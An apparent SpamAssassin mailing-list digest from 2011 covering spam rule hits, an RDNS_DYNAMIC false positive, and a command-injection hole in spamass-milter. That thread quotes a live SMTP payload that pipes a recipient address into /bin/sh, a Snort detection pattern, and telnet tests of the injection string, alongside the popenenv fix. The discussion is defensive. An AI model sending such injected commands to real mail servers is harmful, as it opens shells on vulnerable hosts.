Re: new gappy domain campaign (w/sample)

[Chip M.]

mouss wrote:
>with a stock config, and without Bayes, it now yields: 

Hmmm, interesting!

Yes, all the "caught" spam here were due to RBL hits.

Which begs the question, what SpamAssassin tests are hitting for 
the misses vs the kills?

Here's what hit (here), for the first 38 missed spams:
  Test  Count
FH_HELO_EQ_D_D_D_D 2
FSL_HELO_DEVICE1
FSL_HELO_NON_FQDN_11
HELO_DYNAMIC_HCC   2
HELO_DYNAMIC_IPADDR2   1
HELO_NO_DOMAIN 1
RCVD_IN_BL_SPAMCOP_NET13
RCVD_IN_BRBL_LASTEXT   2
RCVD_IN_PBL2 *
RDNS_DYNAMIC   3
RDNS_NONE  1

Here's what hit for the first 26 caught spams:
  Test  Count
AXB_HELO_HOME_UN   1
DATE_IN_FUTURE_Q_PLUS  1
FH_HELO_EQ_D_D_D_D12
FSL_HELO_DEVICE1
FSL_HELO_NON_FQDN_18
HELO_DYNAMIC_DHCP  3
HELO_DYNAMIC_IPADDR9
HELO_DYNAMIC_IPADDR2   5
HELO_DYNAMIC_SPLIT_IP  1
HELO_LH_HOME   1
HELO_NO_DOMAIN 8
RCVD_IN_BRBL_LASTEXT  22
RCVD_IN_PBL   25 *
RCVD_IN_PSBL   1
RCVD_IN_SORBS_DUL  3
RCVD_IN_XBL1
RDNS_DYNAMIC  16
RDNS_NONE 10

The contrast in PBL hits is interesting.
I wonder if RBLs list more aggressively if the IP is already on PBL?
Just a casual thought/question. :)


>here, it gets BAYES_99 as well. 

Is that based on feeding any of these to your Bayes?

I just checked my latest samples, and they're still identical, 
body-wise, so feeding should be extremely effective.

I forgot to mention that these are hitting a few dictionary 
accounts which only receive spam from our old nemesis, the clever
wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
these to morph, real soon. :\

In the past, that guy's campaigns have had a similarly low hit 
rate on PBL.  I've always wondered how he/they achieve that.
- "Chip"

Re: new gappy domain campaign (w/sample)

[Benny Pedersen]

On Wed,  9 Feb 2011 22:09:08 + (UTC), "Chip M."
 wrote:
> There's an interesting new insecure-boy-drugs campaign that's 
> about 8% of our post-gateway traffic.  It started early today.

if you are user on linkedin then report it to ab...@linkedin.com, just
funny to see its sent from a linkedin server that dont dkim sign it

gappy domains is just not going to work, since recipient is not so
clueless to type g o o g l e . c o m :=)

Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Michael Scheidell]

heads up:

if case you are using spamassassin milter:

active exploits going on.




Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


 Original Message 
Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt












The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it.  Although, if we're not seeing 
this sort of thing pop up on customer's boxes, a manual block in 
scanner2 is sufficient for now, right?


Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


is the snort rule specific enough that you can block the offending ip 
for 5 mins?


(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this.  I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-al...@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


02/10-12:00:59  TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300

*| *SECNAP Network Security Corporation


·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/

__  

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[David F. Skoll]

On Thu, 10 Feb 2011 12:42:40 -0500
Michael Scheidell  wrote:

> heads up:

Aieee popen() in security-sensitive software!??!??

Also, why does the milter process run as root?  That seems like a huge
hole all by itself.

Regards,

David.

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Adam Katz]

Copying the spamass-milter mailing list.

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
>> if case you are using spamassassin milter:
>> 
>> active exploits going on.
>> 
>> 
>> 
>> 
>> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>> 
>> I don't see anything on bugtraq about a fix.

On 02/10/2011 10:21 AM, David F. Skoll wrote:
> Aieee popen() in security-sensitive software!??!??
> 
> Also, why does the milter process run as root?  That seems like a huge
> hole all by itself.


Does this affect sendmail as well as postfix?  I assume so, but wanted
an explicit confirmation.  (I am no longer managing an environment that
uses this milter and therefore cannot verify myself.)
--- Begin Message ---

heads up:

if case you are using spamassassin milter:

active exploits going on.




Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


 Original Message 
Subject: 	RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt












The rule is only looking for this:

content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it.  Although, if we're not seeing 
this sort of thing pop up on customer's boxes, a manual block in 
scanner2 is sufficient for now, right?


Either way, let me know and I'll block/unblock/leave alone.

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*Michael Scheidell
*Sent:* Thursday, February 10, 2011 12:25 PM
*To:* John Meyer
*Cc:* Jonathan Scheidell; Anthony Wetula
*Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


is the snort rule specific enough that you can block the offending ip 
for 5 mins?


(if its a real smtp server, it will retry) and legit email through.



On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this.  I blocked that IP with samtool.

Payload:

rcpt to: root+:"|exec /bin/sh 0&0 2>&0"

data

.

quit

--

John Meyer

Associate Security Engineer


|SECNAP Network Security


Office: (561) 999-5000 x:1235

Direct: (561) 948-2264

*From:*SECNAP Network Security
*Sent:* Thursday, February 10, 2011 12:01 PM
*To:* security-al...@scanner2.secnap.com
*Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter 
Plugin Remote Arbitrary Command Injection Attempt


02/10-12:00:59  TCP 62.206.228.188:56691 --> 10.70.1.33:25
[1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote 
Arbitrary Command Injection Attempt

[Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300

*| *SECNAP Network Security Corporation


·Certified SNORT Integrator

·2008-9 Hot Company Award Winner, World Executive Alliance

·Five-Star Partner Program 2009, VARBusiness

·Best in Email Security,2010: Network Products Guide

·King of Spam Filters, SC Magazine 2008


__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/

__  --- End Message ---


signature.asc
Description: OpenPGP digital signature

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Mark Martinec]

On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> Does this affect sendmail as well as postfix?  I assume so,
> but wanted an explicit confirmation.

Yes, the security hole is entirely within the milter,
independent of the MTA.

  Mark

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Jason Haar]

On 02/11/2011 09:37 AM, Mark Martinec wrote:
> Yes, the security hole is entirely within the milter,
> independent of the MTA.
>
That exploit is dated Mar 2010? Has this really not been fixed in about
a year???

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[David F. Skoll]

On Fri, 11 Feb 2011 09:50:05 +1300
Jason Haar  wrote:

> That exploit is dated Mar 2010? Has this really not been fixed in
> about a year???

If everyone is talking about http://savannah.nongnu.org/projects/spamass-milt/,
it looks like the last release was in 2006.  It looks like that project
is abandoned.

Regards,

David.

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[David F. Skoll]

Sorry to follow up on myself...

> If everyone is talking about
> http://savannah.nongnu.org/projects/spamass-milt/, it looks like the
> last release was in 2006.  It looks like that project is abandoned.

I cannot edit the wiki, but I think spamass-milt should be removed from
http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
unsafe.  There are several other milters available; people shouldn't
be using spamass-milt.

Regards,

David.

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Patrick Ben Koetter]

* Mark Martinec :
> On Thursday February 10 2011 21:14:59 Adam Katz wrote:
> > Does this affect sendmail as well as postfix?  I assume so,
> > but wanted an explicit confirmation.
> 
> Yes, the security hole is entirely within the milter,
> independent of the MTA.

I tried the exploit and it seems that Postfix' restrictions that check for FQDN
address and correct recipient syntax prevent the exploit from getting through:

telnet mail.example.de 25
220 mail.example.de ESMTP Postfix
HELO foo
250 mail.example.de
MAIL FROM:<>
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:
504 5.5.2 : Recipient address rejected: need 
fully-qualified address
RCPT TO:
501 5.1.3 Bad recipient address syntax
QUIT
221 2.0.0 Bye

Can anyone confirm this?

p@rick


-- 
state of mind
Digitale Kommunikation

http://www.state-of-mind.de

Franziskanerstraße 15  Telefon +49 89 3090 4664
81669 München  Telefax +49 89 3090 4666

Amtsgericht MünchenPartnerschaftsregister PR 563

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Karsten Bräckelmann]

On Thu, 2011-02-10 at 16:04 -0500, David F. Skoll wrote:
> I cannot edit the wiki,

I'd be happy to change that. :)

Please just drop me your wiki user name. Same goes for everyone else who
wants to edit the wiki. We've been forced to put ACLs in place as a
counter measure to vandalism and abuse for spam.


> [...] but I think spamass-milt should be removed from
> http://wiki.apache.org/spamassassin/IntegratedInMta or at least marked
> unsafe.  There are several other milters available; people shouldn't
> be using spamass-milt.

-- 
char *t="\10pse\0r\0dtu\0.@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4";
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;i>=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}

Re: new gappy domain campaign (w/sample)

[mouss]

Le 10/02/2011 10:09, Chip M. a écrit :
> mouss wrote:
>> with a stock config, and without Bayes, it now yields: 
> 
> Hmmm, interesting!
> 
> Yes, all the "caught" spam here were due to RBL hits.
> 
> Which begs the question, what SpamAssassin tests are hitting for 
> the misses vs the kills?
> 
> Here's what hit (here), for the first 38 missed spams:
>   Test  Count
> FH_HELO_EQ_D_D_D_D 2
> FSL_HELO_DEVICE1
> FSL_HELO_NON_FQDN_11
> HELO_DYNAMIC_HCC   2
> HELO_DYNAMIC_IPADDR2   1
> HELO_NO_DOMAIN 1
> RCVD_IN_BL_SPAMCOP_NET13
> RCVD_IN_BRBL_LASTEXT   2
> RCVD_IN_PBL2 *
> RDNS_DYNAMIC   3
> RDNS_NONE  1
> 
> Here's what hit for the first 26 caught spams:
>   Test  Count
> AXB_HELO_HOME_UN   1
> DATE_IN_FUTURE_Q_PLUS  1
> FH_HELO_EQ_D_D_D_D12
> FSL_HELO_DEVICE1
> FSL_HELO_NON_FQDN_18
> HELO_DYNAMIC_DHCP  3
> HELO_DYNAMIC_IPADDR9
> HELO_DYNAMIC_IPADDR2   5
> HELO_DYNAMIC_SPLIT_IP  1
> HELO_LH_HOME   1
> HELO_NO_DOMAIN 8
> RCVD_IN_BRBL_LASTEXT  22
> RCVD_IN_PBL   25 *
> RCVD_IN_PSBL   1
> RCVD_IN_SORBS_DUL  3
> RCVD_IN_XBL1
> RDNS_DYNAMIC  16
> RDNS_NONE 10
> 
> The contrast in PBL hits is interesting.
> I wonder if RBLs list more aggressively if the IP is already on PBL?
> Just a casual thought/question. :)
> 
> 
>> here, it gets BAYES_99 as well. 
> 
> Is that based on feeding any of these to your Bayes?
> 

No. it's from feeding unrelated spam (didn't even notice the campaign!).
that said, I have some accounts that are only used for specific purposes
(for example, the account I'm using now is only used for mailing list
mail. and since such mail is automatically moved to folders, what stays
in "inbox" is mostly spam - except for users who reply offlist but
ignore the reply-to header).

> I just checked my latest samples, and they're still identical, 
> body-wise, so feeding should be extremely effective.
> 
> I forgot to mention that these are hitting a few dictionary 
> accounts which only receive spam from our old nemesis, the clever
> wavy-images/RTF/ZIP/etc guy.  That's a major reason that I expect
> these to morph, real soon. :\
> 
> In the past, that guy's campaigns have had a similarly low hit 
> rate on PBL.  I've always wondered how he/they achieve that.

"they" may check candidate IPs against PBL before sending spam. This is
why I think "generic dns" rules are a good thing, because they cover a
lot more than pbl. (unfortuantely, they also hit legit people who don't
take the effort to get whitelisted...)

Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[JKL]

Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
RCPT TO:
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:&0 2>&0">
250 2.1.5 Ok
data
354 End data with .
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
rcpt to:&0 2>&0">
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.
$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 2048
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
rcpt to:&0 2>&0">
550 5.1.0 : Sender address rejected: User unknown
in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.





On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> if case you are using spamassassin milter:
>
> active exploits going on.
>
> 
> 
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
>
>  Original Message 
> Subject:  RE: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
>   
>
>   
>
>   
>
>   
>
>
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
>  
>
> Personally, I would probably block it.  Although, if we’re not seeing
> this sort of thing pop up on customer’s boxes, a manual block in
> scanner2 is sufficient for now, right?
>
>  
>
> Either way, let me know and I’ll block/unblock/leave alone.
>
>  
>
>  
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>  
>
> *From:*Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin
> Milter Plugin Remote Arbitrary Command Injection Attempt
>
>  
>
> is the snort rule specific enough that you can block the offending ip
> for 5 mins?
>
> (if its a real smtp server, it will retry) and legit email through.
>
>
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don’t like the looks of this.  I blocked that IP with samtool.
>
>  
>
> Payload:
>
>  
>
> rcpt to: root+:"|exec /bin/sh 0&0 2>&0"
>
> data
>
> .
>
> quit
>
>  
>
>  
>
>  
>
> --
>
> John Meyer
>
> Associate Security Engineer
>
> >|SECNAP Network Security
>
> Office: (561) 999-5000 x:1235
>
> Direct: (561) 948-2264
>
>  
>
> *From:*SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-al...@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter
> Plugin Remote Arbitrary Command Injection Attempt
>
>  
>
> 02/10-12:00:59  TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote
> Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
>  
>
> -- 
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> ISN: 1259*1300
> >*| *SECNAP Network Security Corporation
>
> · Certified SNORT Integrator
>
> · 2008-9 Hot Company Award Winner, World Executive Alliance
>
> · Five-Star Partner Program 2009, VARBusiness
>
> · Best in Email Security,2010: Network Products Guide
>
> · King of Spam Filters, SC Magazine 2008
>
>
> 
>
> This email has been scanned and certified safe by SpammerTrap®.
> For Information please see http://www.secnap.com/products/spammertrap/
>
> 
>

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[David B Funk]

On Fri, 11 Feb 2011, Jason Haar wrote:

> On 02/11/2011 09:37 AM, Mark Martinec wrote:
> > Yes, the security hole is entirely within the milter,
> > independent of the MTA.
> >
> That exploit is dated Mar 2010? Has this really not been fixed in about
> a year???
>
>

"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


-- 
Dave Funk  University of Iowa
College of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include 
Better is not better, 'standard' is better. B{

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[John Hardin]

On Thu, 10 Feb 2011, David B Funk wrote:


On Fri, 11 Feb 2011, Jason Haar wrote:


On 02/11/2011 09:37 AM, Mark Martinec wrote:

Yes, the security hole is entirely within the milter,
independent of the MTA.


That exploit is dated Mar 2010? Has this really not been fixed in about
a year???




"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


heh.

I suppose we ought to compose a boilerplate response for the inevitable 
visitors who will show up asking about this "exploit in SpamAssassin"...


--
 John Hardin KA7OHZhttp://www.impsec.org/~jhardin/
 jhar...@impsec.orgFALaholic #11174 pgpk -a jhar...@impsec.org
 key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C  AF76 D822 E6E6 B873 2E79
---
  Any time law enforcement becomes a revenue center, the system
  becomes corrupt.
---
 2 days until Abraham Lincoln's and Charles Darwin's 202nd Birthdays

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Mark Martinec]

On Thursday February 10 2011 22:26:37 Patrick Ben Koetter wrote:
> I tried the exploit and it seems that Postfix' restrictions that check for
> FQDN address and correct recipient syntax prevent the exploit from getting
> through:

> RCPT TO:root+:"|touch /tmp/foo"
> 501 5.1.3 Bad recipient address syntax
> RCPT TO:
> 504 5.5.2 : Recipient address rejected: need
> fully-qualified address
> RCPT TO:
> 501 5.1.3 Bad recipient address syntax

> Can anyone confirm this?

rcpt to:
250 2.1.5 Ok


  Mark

Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Warren Togami Jr.]

On 2/10/2011 1:29 PM, John Hardin wrote:

On Thu, 10 Feb 2011, David B Funk wrote:


On Fri, 11 Feb 2011, Jason Haar wrote:


On 02/11/2011 09:37 AM, Mark Martinec wrote:

Yes, the security hole is entirely within the milter,
independent of the MTA.


That exploit is dated Mar 2010? Has this really not been fixed in about
a year???




"a year"??, try half-a-decade. I've got a copy of that code from March
2006 and the vulnerability is there. Rather stale project. ;)


heh.

I suppose we ought to compose a boilerplate response for the inevitable
visitors who will show up asking about this "exploit in SpamAssassin"...



Perhaps more than boilerplate, but rather an official advisory to clear 
up the confusion?  Given that upstream of that milter is dead, nobody 
else will make an official advisory?


Warren

FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Adam Katz]

On 02/10/2011 09:42 AM, Michael Scheidell wrote:
> active exploits going on.
> 
> 
> 
> 
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
> 
> I don't see anything on bugtraq about a fix.

The fix (to use popenenv in place of popen) has been noted on the
spamass-milter list.  It was released downstream by both Red Hat and
Debian in March 2010:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=573228

I've attached the current diff from Debian (note it includes everything,
including the debian/ subdirectory, rather than just that one issue).


... Why is Amavis here for the ride?  They don't use spamass-milter!


spamass-milter_0.3.1-10.diff.gz
Description: GNU Zip compressed data


signature.asc
Description: OpenPGP digital signature

mx1.res.cisco.com a dynamic ip?

[Michael Scheidell]

host mx1.res.cisco.com
mx1.res.cisco.com has address 208.90.57.13
$ host 208.90.57.13
13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.


looks fine to me, why does this look to SA like a dynamic ip?

(TRIGGERED RDNS_DYNAMIC.)

what, because of 'res' in it?  yes, they SHOUTED AT THE RECIPIENT, AND I 
EXPLAINED DON'T DO THAT IN SUBJECT LINE, its rude.


sorry, sender, receiver are all confidential, but here is a debug:  
(network and bayes tests pushed it past 5.0)


__ANY_TEXT_ATTACH,__ANY_TEXT_ATTACH_DOC,__CT,__CTYPE_HAS_BOUNDARY,
__CTYPE_MULTIPART,__CTYPE_MULTIPART_ANY,__DKIM_DEPENDABLE,__DOS_HAS_ANY_URI,
__DOS_LINK,__DOS_RCVD_THU,__DOS_RELAYED_EXT,__ENV_AND_HDR_FROM_MATCH,__FORGED_RCVD_TRAIL,
__HAS_ANY_EMAIL,__HAS_ANY_URI,__HAS_DATE,__HAS_MESSAGE_ID,__HAS_MSGID,__HAS_RCVD,__HAS_SUBJECT,
__LAST_EXTERNAL_RELAY_NO_AUTH,__LAST_UNTRUSTED_RELAY_NO_AUTH,__LOCAL_PP_NONPPURL,__MANY_RECIPS
,__MIME_ATTACHMENT,__MIME_BASE64,__MIME_CTYPE_TEXT,__MIME_HTML,__MIME_VERSION,__MISSING_REF,__MISSING_REPLY
__MSGID_JAVAMAIL,__MSGID_OK_DIGITS,__NONEMPTY_BODY,__NO_REAL_NAME,__PART_STOCK_CD_F,
*__RCD_RDNS_MX_MESSY,__RDNS_INDICATOR_RES,*__SANE_MSGID,
__SENDER_BOT,__SUBSCRIPTION_INFO,__TAG_EXISTS_BODY,__TAG_EXISTS_HEAD,
__TAG_EXISTS_HTML,__TAG_EXISTS_META,__TOCC_EXISTS,__TO_EQ_FROM_DOM,
__TO_EQ_FROM_DOM_1,__TO_NO_ARROWS_R,__TVD_MIME_ATT_TP
Content analysis details:   (3.0 points, 5.0 required)

 pts rule name  description
 -- 
--

 0.0 RELAY_COUNTRY_US   Relayed through United States
 1.6 SUBJ_ALL_CAPS  Subject is all capitals
 0.0 HTML_MESSAGE   BODY: HTML included in message
 0.4 RDNS_DYNAMIC   Delivered to internal network by host with
dynamic-looking rDNS
 1.0 NO_REAL_NAME   NO_REAL_NAME


--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
>*| *SECNAP Network Security Corporation

   * Certified SNORT Integrator
   * 2008-9 Hot Company Award Winner, World Executive Alliance
   * Five-Star Partner Program 2009, VARBusiness
   * Best in Email Security,2010: Network Products Guide
   * King of Spam Filters, SC Magazine 2008

__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
__  

Re: FIX for ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

[Mark Martinec]

Adam Katz wrote:
> ... Why is Amavis here for the ride?  They don't use spamass-milter!

Unrelated. Just Michael being "at home" on both mailing lists.

  Mark

Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt (fwd)

[Andrew Daviel]

On Thu, 10 Feb 2011, Michael Scheidell wrote:





Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.


The securityfocus page lists some Debian fixes. The Debian patch 
spamass-milter_0.3.1-8+lenny2.diff.gz changelog includes:

+spamass-milter (0.3.1-8+lenny1) stable-security; urgency=high
+
+  * Use new popenenv function instead of open; fixes remote code exploit
+as the spamass-milter user when run using -x. (closes: #573228)
+
+ -- Don Armstrong   Wed, 17 Mar 2010 12:52:56 -0700

per http://security.debian.org/pool/updates/main/s/spamass-milter/

--
Andrew Daviel, TRIUMF, Canada
Tel. +1 (604) 222-7376  (Pacific Time)
Network Security Manager

Re: mx1.res.cisco.com a dynamic ip?

[Warren Togami Jr.]

On 2/10/2011 2:30 PM, Michael Scheidell wrote:

host mx1.res.cisco.com
mx1.res.cisco.com has address 208.90.57.13
$ host 208.90.57.13
13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.


looks fine to me, why does this look to SA like a dynamic ip?

(TRIGGERED RDNS_DYNAMIC.)

what, because of 'res' in it? yes, they SHOUTED AT THE RECIPIENT, AND I
EXPLAINED DON'T DO THAT IN SUBJECT LINE, its rude.



The RDNS_DYNAMIC rule might be better to be replaced by the more precise 
S25R-based patterns in KHOP_DYNAMIC.  Care enough?  Please file a bug 
and look into the relative results of the masschecks to start an analysis.


Warren

Re: mx1.res.cisco.com a dynamic ip?

[Sahil Tandon]

On Thu, 2011-02-10 at 19:30:15 -0500, Michael Scheidell wrote:

> host mx1.res.cisco.com
> mx1.res.cisco.com has address 208.90.57.13
> $ host 208.90.57.13
> 13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.
> 
> looks fine to me, why does this look to SA like a dynamic ip?
> 
> (TRIGGERED RDNS_DYNAMIC.)

Probably __RDNS_INDICATOR_RES, which is included in the RDNS_DYNAMIC
meta rule definition.

> what, because of 'res' in it?

Apparently... from 20_dynrdns.cf:

# this hits a little ham, not too much though
header __RDNS_INDICATOR_RES   X-Spam-Relays-External =~ /^[^\]]+ 
rdns=\S+[\-\.](?:res|resnet|client)[\-\.]/i

-- 
Sahil Tandon 

Re: mx1.res.cisco.com a dynamic ip?

[Karsten Bräckelmann]

On Thu, 2011-02-10 at 19:30 -0500, Michael Scheidell wrote:
> host mx1.res.cisco.com
> mx1.res.cisco.com has address 208.90.57.13
> $ host 208.90.57.13
> 13.57.90.208.in-addr.arpa domain name pointer mx1.res.cisco.com.
> 
> looks fine to me, why does this look to SA like a dynamic ip?

Kind of... irrelevant. In this context. Or rather, terribly confusing.

In your snippet, RDNS_DYNAMIC accounts for a score of 0.4 (score-set 1),
but you said that network tests and Bayes pushed it above the threshold.
That would be score-set 4, and this one rule scoring just shy of 1.0.

So, what are the real rules hit, the real scores? What weight did the
network rules and Bayes have? More than that 1.0? Which rule really
caused the FP here?


> sorry, sender, receiver are all confidential, but here is a debug:  
> (network and bayes tests pushed it past 5.0)

> Content analysis details:   (3.0 points, 5.0 required)

>   0.0 RELAY_COUNTRY_US   Relayed through United States
>   1.6 SUBJ_ALL_CAPS  Subject is all capitals
>   0.0 HTML_MESSAGE   BODY: HTML included in message
>   0.4 RDNS_DYNAMIC   Delivered to internal network by host with
>  dynamic-looking rDNS
>   1.0 NO_REAL_NAME   NO_REAL_NAME

-- 
